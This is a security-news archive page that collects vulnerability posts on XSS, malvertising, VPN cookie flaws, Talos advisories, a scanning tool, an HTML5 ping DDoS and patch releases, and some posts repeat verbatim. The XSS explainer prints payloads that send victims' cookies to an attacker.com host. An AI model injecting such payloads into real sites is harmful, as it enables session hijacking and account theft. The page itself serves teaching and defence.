Category Archives: Vulnerability

The Cross-site Scripting (XSS) Vulnerability: Definition and Prevention

The Cross-Site Scripting vulnerability is one of the few vulnerabilities that has made it in every OWASP Top 10 list of most critical web application security risks released.

The Cross-site Scripting (XSS) Vulnerability: Definition and Prevention

To understand the Cross-site Scripting vulnerability you have to first understand the basic concept of the Same Origin Policy (SOP), which forbids a web application to retrieve content from pages with another origin. By forbidding access to cross-origin content random websites cannot not read or modify data from your Facebook page or PayPal account while logged in to them.

SOP is one of the most important security principles in every web browser. For example the page https://example.com/index.html can access content from https://example.com/about.html while https://attacker.com/index.html cannot access content from https://example.com/about.html.

The Cross-site Scripting (XSS) Vulnerability

Cross-site Scripting, also known as XSS, is a way of bypassing the SOP concept in a vulnerable web application. Whenever HTML code is generated dynamically, and the user input is not sanitized and is reflected on the page an attacker could insert his own HTML code. The web browser will still show the user's code since it pertains to the website where it is injected.

In such case an attacker can easily insert JavaScript code which would run under the site's context. By doing so the attacker is able to access other pages on the same domain and can read data like CSRF-Tokens or the set cookies.

If the cookies, which typically contain session identifier information, can be read by the client-side JavaScript code, the attacker can use them on his own browser and login to the web application as the victim. If that does not work the attacker can still read private information from the pages, such as read CSRF tokens and make requests on behalf of the user.

Different Types of Cross-Site Scripting Vulnerability

There are mainly three different types of Cross-site Scripting vulnerability; Stored, Reflected and DOM XSS. Below you can find a detailed technical explanation of each of them.

Stored Cross-site Scripting Vulnerability

Stored Cross-site scripting vulnerabilities happens when the payload is saved, for example in a database and then is executed when a user opens the page on the web application. Stored cross-site scripting is very dangerous for a number of reasons:

  • The payload is not visible for the browser's XSS filter
  • Users might accidentally trigger the payload if they visit the affected page, while a crafted url or specific form inputs would be required for exploiting reflected XSS.

Example of a Stored XSS

A stored XSS vulnerability can happen if the username of an online message board is not properly sanitized when it is printed on the page. In such case an attacker can insert malicious code when registering a new user on the form. When the username is reflected on the message board page, it will look like this:

Username: user123document.location='https://attacker.com/?cookie='+encodeURIComponent(document.cookie)
Registered since: 2016

The above malicious JavaScript is triggered every time a user visits this forum section, and it sends the message board user's cookies that is stored in the user's browser to the attacker, who then uses them to hijack the user's sessions. Stored XSS can be a very dangerous vulnerability since it can have the effect of a worm, especially when exploited on popular pages.

For example imagine a message board or social media website that has a public facing page that is vulnerable to a stored XSS vulnerability, such as the profile page of the user. If the attacker is able to place malicious JavaScript payload that adds itself to the profile page, the attack vector is executed every time a visitor opens the page and the payload spreads itself with an exponential growth.

Reflected Cross-site Scripting (XSS) Vulnerability

A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This means that an attacker has to send a crafted malicious URL  or post form to the victim to insert the payload, and the victim should click the link. This kind of payload is also generally being caught by built-in XSS filters in user's browsers, like Chrome, Internet Explorer or Edge.

Example of a Reflected XSS

As an example of XSS attacks we will use a search functionality on a news website, which works by appending the user's input, which is taken from the GET HTTP request, to the q parameter, as per the example below:

https://example.com/news?q=data+breach

In the search results the website reflects the content of the query that the user searched for, such as:

You searched for "data breach":

If the Search functionality is vulnerable to a reflected cross-site scripting vulnerability, the attacker can send the victim a malicious URL such as the below:

https://example.com/news?q=document.location='https://attacker.com/log.php?c=' + encodeURIComponent(document.cookie)

Once the victim clicks on the malicious URL, the XSS attack is executed and the website displays the following:

You searched for "document.location='https://attacker.com/log.php?c=' + document.cookie":

The HTML source code, which is reflecting the attacker's malicious code redirects the victim's browser to a website that is controlled by the attacker, which then steals the user's current session cookies / session tokens from the victim's browser for the site example.com as GET parameter.

DOM Based Cross-Site Scripting Vulnerability

The DOM Based XSS vulnerability happens in the DOM (Document Object Model) instead of part of the HTML. Read DOM Based Cross-site Scripting (XSS) vulnerability for a detailed explanation of DOM XSS.

Impacts of the Cross-site Scripting Vulnerability

The impact of an exploited XSS vulnerability on a web application varies a lot. It ranges from user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other security vulnerabilities. By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account. Read about the apache.org jira incident for more information on how a XSS vulnerability was used in a successful attack which also led to code execution.

Preventing XSS Vulnerabilities

To prevent XSS security vulnerabilities it is very important to apply a context dependent output encoding. In some cases it might be enough to encode the HTML special characters, such as opening and closing tags. In other cases a correctly applied URL encoding is necessary. Links should generally be disallowed if they don't begin with a whitelisted protocol such as http:// or https://, thus preventing the use of URI schemes such as javascript://.

Even though most modern web browsers have an inbuilt XSS filter they should not be seen as an alternative to sanitization. They cannot catch all kinds of cross-site scripting attacks and are not strict so not to lead to false positives, which would prevent some pages from loading correctly. A web browser's XSS filter should only be a "second line of defense" and the idea is to minimise the impact of existing vulnerabilities.

Developers should not use blacklists as there is a variety of bypasses for them. Another thing they should avoid using is the stripping of dangerous functions and characters as the browsers' XSS filters can't recognize the dangerous payloads when the output is tampered with allowing for possible bypasses. That being said, the only recommended prevention of XSS is encoding as mentioned above.

Vulnerability Classification and Severity Table

Classification ID / Severity
PCI v3.2 6.5.7
CAPEC 19
CWE 79
WASC 8
OWASP 2013 A3
OWASP 2017 A7
HIPAA 164.308(a)
CVSS:3.0
CVSS:3.0/VA:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker High

The post The Cross-site Scripting (XSS) Vulnerability: Definition and Prevention appeared first on Security Boulevard.

Drupal Releases Core CMS Updates to Patch Several Vulnerabilities

Drupal, the popular open-source content management system, has released security updates to address multiple "moderately critical" vulnerabilities in Drupal Core that could allow remote attackers to compromise the security of hundreds of thousands of websites. According to the advisories published today by the Drupal developers, all security vulnerabilities Drupal patched this month reside in

E Hacking News – Latest Hacker News and IT Security News: Chrome Utilized for iOS Vulnerability by a Threat Group to Bypass the Browser’s Built-In Pop-Up Blocker



eGobbler, a threat group recently targeted iOS users from the U.S. alongside various European Union Countries through numerous massive malvertising attacks for almost a week and utilized Chrome for iOS vulnerability to sidestep the browser's built-in in pop blocker.

The said threat group utilized "8 individual campaigns and more than 30 fake creatives" all through their push, with every one of the fake ad crusades having life spans of somewhere in the range of 24 and 48 hours.

As per the Confiant researchers who found and observed eGobbler's iOS-targeted attacks, approximately 500 million users' sessions were somehow exposed to this extensive scale coordinated campaign pushing counterfeit promotions i.e. fake ads.


As found by Confiant's specialists eGobbler's campaigns more often than not remain active for a maximum limit of 48 hours, quickly pursued by brief times of hibernation which unexpectedly end when the next attack begins.

Some of them are even seen to have used landing pages facilitated on .world domains utilizing pop-ups to hi-jack users' sessions and divert the unfortunate casualties to vindictive pages, as this technique helps the attackers in phishing as well as in malware dropping purposes.

Anyway this campaign was not the first of its kind designed by the eGobbler malvertising group to explicitly target iOS users, as in November 2018, Confiant observed one more campaign kept running by the ScamClub group which figured out how to capture approximately 300 million iOS user sessions and diverted them all adult content and gift voucher tricks.

Be that as it may, as Confiant said in their report, "This really was a standout campaign compared to the others that we track based not only on the unique payload, but the volumes as well?"
They later included that “With almost half a billion user sessions impacted, this is among the top three massive malvertising campaigns that we have seen in the last 18 months."



E Hacking News - Latest Hacker News and IT Security News

Chrome Utilized for iOS Vulnerability by a Threat Group to Bypass the Browser’s Built-In Pop-Up Blocker



eGobbler, a threat group recently targeted iOS users from the U.S. alongside various European Union Countries through numerous massive malvertising attacks for almost a week and utilized Chrome for iOS vulnerability to sidestep the browser's built-in in pop blocker.

The said threat group utilized "8 individual campaigns and more than 30 fake creatives" all through their push, with every one of the fake ad crusades having life spans of somewhere in the range of 24 and 48 hours.

As per the Confiant researchers who found and observed eGobbler's iOS-targeted attacks, approximately 500 million users' sessions were somehow exposed to this extensive scale coordinated campaign pushing counterfeit promotions i.e. fake ads.


As found by Confiant's specialists eGobbler's campaigns more often than not remain active for a maximum limit of 48 hours, quickly pursued by brief times of hibernation which unexpectedly end when the next attack begins.

Some of them are even seen to have used landing pages facilitated on .world domains utilizing pop-ups to hi-jack users' sessions and divert the unfortunate casualties to vindictive pages, as this technique helps the attackers in phishing as well as in malware dropping purposes.

Anyway this campaign was not the first of its kind designed by the eGobbler malvertising group to explicitly target iOS users, as in November 2018, Confiant observed one more campaign kept running by the ScamClub group which figured out how to capture approximately 300 million iOS user sessions and diverted them all adult content and gift voucher tricks.

Be that as it may, as Confiant said in their report, "This really was a standout campaign compared to the others that we track based not only on the unique payload, but the volumes as well?"
They later included that “With almost half a billion user sessions impacted, this is among the top three massive malvertising campaigns that we have seen in the last 18 months."

Naked Security – Sophos: Internet Explorer browser flaw threatens all Windows users

Nearly four years after it was replaced by Edge as Microsoft’s preferred Windows browser, researchers keep finding unpleasant security flaws in Internet Explorer (IE).



Naked Security - Sophos

Banking Trojan Emotet Now Targets Legitimate Email Chains to Deploy Malware

Emotets’ banking trojan has now evolved, it would seem it now has taken on new tactics in the form of

Banking Trojan Emotet Now Targets Legitimate Email Chains to Deploy Malware on Latest Hacking News.

Bad security hygiene still a major risk for enterprise IT networks

Unpatched vulnerabilities, along with growing network and application complexity pose an ongoing security risk which could threaten the security of enterprise IT networks. Analyzing the biggest security findings over the past year, Keysight has released the third annual security report from Ixia’s Application and Threat Intelligence (ATI) Research Center. Humans are the weakest link In 2018, Ixia detected 662,618 phishing pages in the wild, and 8,546,295 pages hosting or infected by malware – so a … More

The post Bad security hygiene still a major risk for enterprise IT networks appeared first on Help Net Security.

E Hacking News – Latest Hacker News and IT Security News: Multiple VPN Applications Allow Attackers to Sidestep Authentication; Assists in Taking Control of Affected Systems




Enterprise VPN applications created by Palo Alto Systems, Pulse Secure, Cisco, and F5 Networks are reportedly known to have been 'storing' authentication and session cookies that too insecurely, as indicated by a DHS/CISA alert with a vulnerability note issued by CERT/CC, conceivably enabling attackers to sidestep authentication.

The caution issued on the 14th of April by the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) additionally expresses that a potential "attacker could exploit this vulnerability to take control of an affected system."

As detailed in the Common Weakness Enumeration database in CWE-311, the way that an application neglects to "encrypt sensitive or critical information before storage or transmission" could permit would-be attacker to intercept traffic information, read it and infuse malignant code/information to play out a Man-in-the-Middle (MitM) attack.

CERT/CC says:
The following products and versions store the cookie insecurely in log files:
- Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS0 (CVE-2019-1573)
- Pulse Secure Connect Secure prior to 8.1R14, 8.2, 8.3R6, and 9.0R2
The following products and versions store the cookie insecurely in memory:
- Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS0 (CVE-2019-1573)
- Pulse Secure Connect Secure prior to 8.1R14, 8.2, 8.3R6, and 9.0R2
-Cisco AnyConnect 4.7.x and prior

As indicated by this note "It is likely that this configuration is generic to additional VPN applications," which suggests that many VPN applications from an aggregate of 237 vendors can conceivably be affected by this data divulgence vulnerability.

Additionally, the vulnerability note composed by Carnegie Mellon University's Madison Oliver says that - "If an attacker has persistent access to a VPN user's endpoint or exfiltrates the cookie using other methods, they can replay the session and bypass other authentication methods. An attacker would then have access to the same applications that the user does through their VPN session."

While VPN applications from Check Point Software Technologies and pfSense were found to not be 'vulnerable', Cisco and Pulse Secure haven't yet issued any data with respect to this vulnerability. Palo Alto Networks have thusly published a security advisory with additional information on this data revelation vulnerability tracked as CVE-2019-1573.

F5 Networks then again, while being "aware of the insecure memory storage since 2013" chosen not to fix it and gives the following solution as a relief measure: "To mitigate this vulnerability, you can use a one-time password or two-factor authentication instead of password-based authentication."



E Hacking News - Latest Hacker News and IT Security News

Multiple VPN Applications Allow Attackers to Sidestep Authentication; Assists in Taking Control of Affected Systems




Enterprise VPN applications created by Palo Alto Systems, Pulse Secure, Cisco, and F5 Networks are reportedly known to have been 'storing' authentication and session cookies that too insecurely, as indicated by a DHS/CISA alert with a vulnerability note issued by CERT/CC, conceivably enabling attackers to sidestep authentication.

The caution issued on the 14th of April by the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) additionally expresses that a potential "attacker could exploit this vulnerability to take control of an affected system."

As detailed in the Common Weakness Enumeration database in CWE-311, the way that an application neglects to "encrypt sensitive or critical information before storage or transmission" could permit would-be attacker to intercept traffic information, read it and infuse malignant code/information to play out a Man-in-the-Middle (MitM) attack.

CERT/CC says:
The following products and versions store the cookie insecurely in log files:
- Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS0 (CVE-2019-1573)
- Pulse Secure Connect Secure prior to 8.1R14, 8.2, 8.3R6, and 9.0R2
The following products and versions store the cookie insecurely in memory:
- Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS0 (CVE-2019-1573)
- Pulse Secure Connect Secure prior to 8.1R14, 8.2, 8.3R6, and 9.0R2
-Cisco AnyConnect 4.7.x and prior

As indicated by this note "It is likely that this configuration is generic to additional VPN applications," which suggests that many VPN applications from an aggregate of 237 vendors can conceivably be affected by this data divulgence vulnerability.

Additionally, the vulnerability note composed by Carnegie Mellon University's Madison Oliver says that - "If an attacker has persistent access to a VPN user's endpoint or exfiltrates the cookie using other methods, they can replay the session and bypass other authentication methods. An attacker would then have access to the same applications that the user does through their VPN session."

While VPN applications from Check Point Software Technologies and pfSense were found to not be 'vulnerable', Cisco and Pulse Secure haven't yet issued any data with respect to this vulnerability. Palo Alto Networks have thusly published a security advisory with additional information on this data revelation vulnerability tracked as CVE-2019-1573.

F5 Networks then again, while being "aware of the insecure memory storage since 2013" chosen not to fix it and gives the following solution as a relief measure: "To mitigate this vulnerability, you can use a one-time password or two-factor authentication instead of password-based authentication."

Vulnerability Spotlight: Denial of service in VMWare Workstation 15


Piotr Bania of Cisco Talos discovered this vulnerability.

Executive summary

VMware Workstation 15 contains an exploitable denial-of-service vulnerability. Workstation allows users to run multiple operating systems on a Linux or Windows PC. An attacker could trigger this particular vulnerability from VMware guest user mode to cause a denial-of-service condition through an out-of-bounds read. This vulnerability only affects Windows machines.

In accordance with our coordinated disclosure policy, Cisco Talos worked with VMware to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

VMware Workstation 15 vertex shader functionality denial-of-service vulnerability (TALOS-2018-0762/CVE-2019-5516)

An exploitable denial-of-service vulnerability exists in VMware Workstation 15. A specially crafted vertex shader can cause denial-of-service issues. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host, leading to a vmware-vmx.exe process crash on host.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that VMware Workstation 15 (15.0.2 build-10952284) with Windows 10 x64 as guestVM is affected by this vulnerability.

CoverageThe following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 49045, 49046

Vulnerability Spotlight: Multiple vulnerabilities in Shimo VPN’s helper tool



Discovered by Tyler Bohan of Cisco Talos.

Overview

Cisco Talos is disclosing a series of vulnerabilities found in the Shimo VPN Helper Tool. Shimo VPN is a popular VPN client for MacOS that can be used to connect multiple VPN accounts to one application. These specific vulnerabilities were found in the “helper tool,” a feature that Shimo VPN uses to accomplish some of its privileged work.

These vulnerabilities are being released without a patch, per our disclosure policy, after repeated attempts were made to communicate with the vendor.

Vulnerability Details

TALOS-2018-0673

TALOS-2018-0673/CVE-2018-4004 is a privilege escalation vulnerability that resides in the Shimo VPN helper service, specifically the disconnectService function. The vulnerability requires local access to the machine but could allow a non-root user to kill privileged processes on the system. 

Detailed vulnerability information can be found here.

TALOS-2018-0674

TALOS-2018-0674/CVE-2018-4005 is an exploitable privilege escalation vulnerability that resides in the Shimo VPN helper service, specifically the configureRoutingWithCommand function. The vulnerability requires local access to the machine but could allow an attacker to escalate their privileges to root.  

Detailed vulnerability information can be found here.

TALOS-2018-0675

TALOS-2018-0675 / CVE-2018-4006 is an exploitable privilege escalation vulnerability that resides in the Shimo VPN helper service, specifically the writeConfig functionality. The vulnerability requires local access to the machine but could allow an attacker to escalate their privileges to root. 

Detailed vulnerability information can be found here.

TALOS-2018-0676

TALOS-2018-0676 / CVE-2018-4007 is an exploitable privilege escalation vulnerability that resides in the Shimo VPN helper service, specifically the deleteConfig functionality. The vulnerability requires local access to the machine but could allow an attacker to delete any protected file on the system. 

Detailed vulnerability information can be found here.

TALOS-2018-0677

TALOS-2018-0677 / CVE-2018-4008 is an exploitable privilege escalation vulnerability that resides in the Shimo VPN helper service, specifically the RunVpncScript command. The vulnerability requires local access to the machine. The command takes a user-supplied script argument and executes it under root context.  

Detailed vulnerability information can be found here.

TALOS-2018-0678

TALOS-2018-0678 / CVE-2018-4009 is an exploitable privilege escalation vulnerability that resides in the Shimo VPN helper service due to improper validation of code signing.  The vulnerability requires local access to the machine but could allow an attacker to escalate their privileges to root.  

Detailed vulnerability information can be found here.

Known Vulnerable Versions

Shimo VPN 4.1.5.1




Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 47801 - 47804

W12Scan – A Simple Asset Discovery Engine For Cybersecurity


Chinese
W12scan is a network asset discovery engine that can automatically aggregate related assets for analysis and use.

Here is a web source program, but the scanning end is at w12scan-client

Thinking
Based on python3 + django + elasticsearch + redis and use the web restful api to add scan targets.
<g-emoji alias=rocket class=g-emoji fallback-src=https://github.githubassets.com/images/icons/emoji/unicode/1f680.png>&#128640;</g-emoji> A simple asset discovery engine for cybersecurity. (&#32593;&#32476;&#36164;&#20135;&#21457;&#29616;&#24341;&#25806;) (2)

Feature

Web
  • Powerful search syntax
    • Search for cms, service, titles, country regions, etc., to quickly find relevant targets.
      • title=“abc” # Search from the title
      • header=“abc” # Search from http header
      • body=“123” # Search from body text
      • url = “*.baidu.com” # Search for subdomains of baidu.com
      • ip = ‘1.1.1.1’ # Search from IP,support '192.168.1.0/24' and '192.168.1.*'
      • port = ‘80’ # Search form port
      • app = ’nginx’ # Search application
      • country = ‘cn’ # Search from country
      • service = ‘mysql’ # Search from service
      • bug = 'xx' # Search from Vulnerability
  • Custom assert
    • By customizing a company-related domain name or ip asset, w12scan will automatically help you find the corresponding asset target. When you browse the target, there is a prominent logo to remind you of the target's ownership.
  • Automatic association
    • Enter the target details. If the target is ip, all domain names on the ip and all domain names on the c class will be automatically associated. If the target is a domain name, the adjacent station, segment c and subdomain are automatically associated.
  • Multi-node management
    • WEB will check the status of the node every few minutes, you can see the number of node scans and the node scan log.
  • Task restful
    • Provides an interface to add tasks, you can add it on the WEB side or integrate it in any software.

Scanning end
  • Poc
    • Call the latest poc script online via airbug
  • Built-in scan script
    • Common vulnerability verification service built into the scanner.
  • Scanning
    • Use masscan,nmap,wappalyzer,w11scan
  • Easy to distribute
    • This is taken into account in the design of the program architecture. It is very easy to distribute and run the scan terminal directly on another machine. It also can be distributed based on docker, celery service.

Installation
Quickly build an environment with docker
git clone https://github.com/boy-hack/w12scan
cd w12scan
docker-compose up -d
Wait a while to visit http://127.0.0.1:8000

Telegram Group
Telegram Group:https://t.me/joinchat/MZ16xA9dfmJCYm4kbv15nA


Apache Tomcat Patches Important Remote Code Execution Flaw

The Apache Software Foundation (ASF) has released new versions of its Tomcat application server to address an important security vulnerability that could allow a remote attacker to execute malicious code and take control of an affected server. Developed by ASF, Apache Tomcat is an open source web server and servlet system, which uses several Java EE specifications such as Java Servlet,

Enterprise VPN apps store authentication and session cookies insecurely

CVE-2019-1573, a flaw that makes VPN applications store the authentication and/or session cookies insecurely (i.e. unencrypted) in memory and/or log files, affects a yet to be determined number of enterprise Virtual Private Network (VPN) applications. “If an attacker has persistent access to a VPN user’s endpoint or exfiltrates the cookie using other methods, they can replay the session and bypass other authentication methods,” Carnegie Mellon University’s CERT Coordination Center (CERT/CC) explained. “An attacker would then … More

The post Enterprise VPN apps store authentication and session cookies insecurely appeared first on Help Net Security.

Intel Patches Vulnerabilities In Four Different Products

Alongside Adobe patches and Microsoft Patch Tuesday updates, Intel has also released security updates for different products patching vulnerabilities posing

Intel Patches Vulnerabilities In Four Different Products on Latest Hacking News.

Microsoft April Patch Tuesday Also Addresses Two Zero-Day Bugs With Numerous Others

Microsoft April Patch Tuesday updates are out with numerous bug fixes. Apart from the other vulnerabilities, Microsoft has also patched

Microsoft April Patch Tuesday Also Addresses Two Zero-Day Bugs With Numerous Others on Latest Hacking News.

The Ping is the Thing: Popular HTML5 Feature Used to Trick Chinese Mobile Users into Joining Latest DDoS Attack

DDoS attacks have always been a major threat to network infrastructure and web applications.

Attackers are always creating new ways to exploit legitimate services for malicious purposes, forcing us to constantly research DDoS attacks in our CDN to build advanced mitigations.

We recently investigated a DDoS attack which was generated mainly from users in Asia. In this case, attackers used a common HTML5 attribute, the <a> tag ping, to trick these users to unwittingly participate in a major DDoS attack that flooded one web site with approximately 70 million requests in four hours.

Rather than a vulnerability, the attack relied on turning a legitimate feature into an attack tool. Also, almost all of the users enlisted in the attack were mobile users of the QQBrowser developed by the Chinese tech giant Tencent and used almost exclusively by Chinese speakers. Though it should be noted that this attack could have involved users of any web browser and that recent news could ensure that these attacks continue to grow — and we’ll explain why later in the article.

How They Did It

Ping is a command in HTML5 that specifies a list of URLs to be notified if the user follows a hyperlink. When the user clicks on the hyperlink, a POST request with the body “ping” will be sent to the URLs specified in the attribute. It will also include headers “Ping-From”, “Ping-To” and a “text/ping” content type.

This attribute is useful for website owners to monitor/track clicks on a link. Read more here.

A simple HTML page containing a link with “ping” attribute
A POST request with the “ping” body

Notification services using ping are not new. The Pingback feature in the popular WordPress CMS notifies a web site owner if a link is clicked. Attackers have used Pingbacks to conduct DDoS attacks by sending millions of requests to vulnerable WordPress instances that are then forced to “reflect” the pingback requests onto the targeted web site.

Besides using the HTML5 ping, this DDoS attack also enlisted mostly mobile users from the same part of the world. While we’ve observed mobile browser-based attacks before, a DDoS attack mostly using the same mobile browser and from the same region is very uncommon.

About 4,000 user IPs were enlisted in the attack, with a significant percentage from China. They generated a peak 7,500 Requests per Second (RPS) during the 4 hour attack, producing an overall 70 million requests.

Diving into the logs to understand the attack, we noticed that all the malicious requests contained the HTTP Headers “Ping-From” and “Ping-To”. This was the first time we had seen a DDoS attack that utilized the <a> tag ping attribute.

Both Ping-Form and Ping-To values referred to the “http://booc.gz.bcebos.com/you.html” URL.

A sample of the requests that were generated by the DDoS attack

This suspicious URL contains a very simple HTML page with two external JavaScript files: “ou.js” and “yo.js”.

http://booc.gz.bcebos.com/you.html”  source code

“ou.js” had a JavaScript array containing URLs — the targets of the DDoS attack.

“OU.JS” JavaScript source code

“yo.js” had a function which randomly selects a target from the array and creates a <a> tag with “ping” attribute pointing to the target URL.

Every second, a <a> tag was created and clicked programmatically causing a “ping” request to be sent to the target website.

Legitimate users that were tricked into visiting this suspected website unwillingly participated in a DDoS attack. The pings will continue to be generated as long as the user stays on this page.

“yo.js” JavaScript source code

The question is: How did the mastermind keep users on this web site in order to keep triggering the ping requests and maintain the ferocious DDoS attack?

We noticed that the User-Agent in the requests is associated with the popular Chinese chat app, WeChat. WeChat uses a default mobile browser to open links in messages. As QQBrowser is very popular in China, many users pick it as a default browser for their smartphone.

Our theory is that social engineering combined with malvertising (malicious advertising) that tricked unsuspecting WeChat users into opening the browser. Here’s one possible scenario:

  1. The attacker injects malicious advertising that loads a suspected website
  2. Link to the legitimate website with the malicious ad in an iframe is posted to a large WeChat group chat
  3. Legitimate users visit the website with the malicious ad
  4. JavaScript code executes, creating a link with the “ping” attribute that the user clicks on
  5. An HTTP ping request is generated and sent to the target domain from the legitimate user’s browser

Final Words

While QQBrowser was overwhelmingly used in this DDoS attack due to its popularity with WeChat users, other web browsers can also be exploited by this ping attack. Worse, the browser makers are taking steps to make it harder for users to turn off the ping feature in their browser that would allow them to avoid being enlisted in such an attack.

According to an article earlier this week in Bleeping Computer tech news site, newer versions of Google Chrome, Apple’s Safari and Opera no longer let you disable hyperlink auditing, aka pings. This is a concern for web architects and security pros worried about this method of launching DDoS attacks spreading.

Fortunately, web site and application operators have some control. If you are not expecting or do not need to receive ping requests to your Web server, block any Web requests that contain “Ping-To” and/or “Ping-From” HTTP headers on the edge devices (Firewall, WAF, etc.). This will stop the ping requests from ever hitting your server. (Note: Imperva DDoS Protection is already updated to prevent ping functionality abuse targeted at your sites.)

Application DDoS attacks are here to stay and will continue to evolve at incredible rates. Attackers are always finding new and creative ways to abuse legitimate services for malicious purposes. At Imperva, we are dedicated to detecting and combating these threats on your behalf.

The post The Ping is the Thing: Popular HTML5 Feature Used to Trick Chinese Mobile Users into Joining Latest DDoS Attack appeared first on Blog.

WPA3 design flaws affect security of new Wi-Fi standard

Researchers have discovered a number of design flaws affecting the security of the recently introduced WPA3 data transmission protocol. Collectively dubbed Dragonblood (because they affect WPA3’s Dragonfly handshake), they can be exploited to mount a DoS attack against a vulnerable access point or, more worryingly, to recover the password of a Wi-Fi network. “Attackers can then read information that WPA3 was assumed to safely encrypt. This can for example be abused to steal sensitive information … More

The post WPA3 design flaws affect security of new Wi-Fi standard appeared first on Help Net Security.

Mainframe security is top priority for 85% of IT pros yet few are adequately protecting their systems

While 85 percent of companies say mainframe security is a top priority, just 33 percent always or often make mainframe decisions based on security. The “Don’t Let Mainframe Security Complacency Leave Your Critical Customer Data At Risk” study commissioned by Key Resources and conducted by Forrester Consulting, surveyed 225 IT management and security decision makers at North American companies with $500 million or more in annual revenue. “Despite widespread awareness concerning the stakes, enterprises simply … More

The post Mainframe security is top priority for 85% of IT pros yet few are adequately protecting their systems appeared first on Help Net Security.

Security Flaws in WPA3 Protocol Let Attackers Hack WiFi Password

🔥 Breaking — It has been close to just one year since the launch of next-generation Wi-Fi security standard WPA3 and researchers have unveiled several serious vulnerabilities in the wireless security protocol that could allow attackers to recover the password of the Wi-Fi network. WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced

Update now! Here’s the April Patch Tuesday roundup

Microsoft and Adobe Patch Tuesday updates are here. Find out more about the most serious bugs and how to patch them.

Vulnerability Spotlight: Adobe Acrobat Reader remote code execution


Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities.

Executive summary

There are two remote code execution vulnerabilities in Adobe Acrobat Reader that could occur if a user were to open a malicious PDF on their machine using the software. Acrobat is the most widely used PDF reader on the market, making the potential target base for these bugs fairly large. The program supports embedded JavaScript code in the PDF to allow for interactive PDF forms, giving the potential attacker the ability to precisely control memory layout and creating an additional attack surface.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Adobe Acrobat Reader DC text field value remote code execution vulnerability (TALOS-2018-0774/CVE-2019-7125)

A specific JavaScript code embedded in a PDF file can lead to a heap corruption when opening a PDF document in Adobe Acrobat Reader DC 2019.10.20069. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. The vulnerability in this advisory is the same as TALOS-2018-0704 (CVE-2018-19716), which was disclosed in December 2018, as it wasn't properly patched to cover all cases.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Adobe Acrobat Reader DC, version 2019.010.20069 is affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48293, 48294

Adobe April Patch Tuesday Addresses Multiple Critical Vulnerabilities In Various Adobe Products

Adobe’s scheduled updates for April 2019 have now rolled out. Allegedly, this update brings fixes for multiple security vulnerabilities in

Adobe April Patch Tuesday Addresses Multiple Critical Vulnerabilities In Various Adobe Products on Latest Hacking News.

Adobe Releases Security Patches for Flash, Acrobat Reader, Other Products

Good morning readers, it's Patch Tuesday again—the day of the month when Adobe and Microsoft release security patches for their software. Adobe just released its monthly security updates to address a total of 40 security vulnerabilities in several of its products, including Flash Player, Adobe Acrobat and Reader, and Shockwave Player. According to an advisory, Adobe Acrobat and Reader

PoC exploit for Carpe Diem Apache bug released

Charles Fol, the security engineer that unearthed the Carpe Diem Apache HTTP Server bug (CVE-2019-0211), has released an exploit for it. “This is between a POC and a proper exploit. I added tons of comments, it is meant to be educational as well,” he noted, but added that it “might fail for a dozen of reasons.” Still, it might help attackers to create a more stable one and deploy it in attacks, so admins – … More

The post PoC exploit for Carpe Diem Apache bug released appeared first on Help Net Security.

Samsung Galaxy S10’ biometric sensor hackable with copy of owner’s fingerprint

By Waqas

The fingerprint security feature of Samsung Galaxy S10 and S10+ has been hacked using only a 3D printer and printed fingerprint of the owner. The hack can be carried out without the presence of the actual owner since a printed copy of the fingerprints is used. When evaluated by security researchers it was confirmed that […]

This is a post from HackRead.com Read the original post: Samsung Galaxy S10’ biometric sensor hackable with copy of owner’s fingerprint

McAfee Blogs: Malware is Coming: Emilia Clarke Is the Most Dangerous “Game of Thrones” Celebrity

The net is dark and full of terrors, especially for fans of HBO’s coveted show “Game of Thrones.” As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just white walkers and the Night King to worry about. According to a McAfee’s study on the Most Dangerous Celebrities, it turns out that the Mother of Dragons herself Emilia Clarke is among those whose search results are most likely to be infected with malware.

